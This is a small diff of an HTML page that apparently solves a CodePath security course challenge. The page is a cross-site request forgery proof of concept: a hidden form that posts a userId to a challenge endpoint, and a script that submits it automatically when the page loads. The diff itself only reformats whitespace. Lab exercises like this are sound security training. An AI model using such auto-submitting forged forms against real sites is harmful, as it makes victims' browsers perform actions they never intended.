--- a/index.html
+++ b/index.html
@@ -1,5 +1,8 @@
 
 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
-   <input type="hidden" name="userId" value="0da0417b6bb930e2382ff25c3551f89fdf22a336" />
+ <input type="hidden" name="userId" value="0da0417b6bb930e2382ff25c3551f89fdf22a336" />
 </form>
-<script> document.csrfForm.submit(); </script>
+<script>
+ document.csrfForm.submit();
+</script>
+
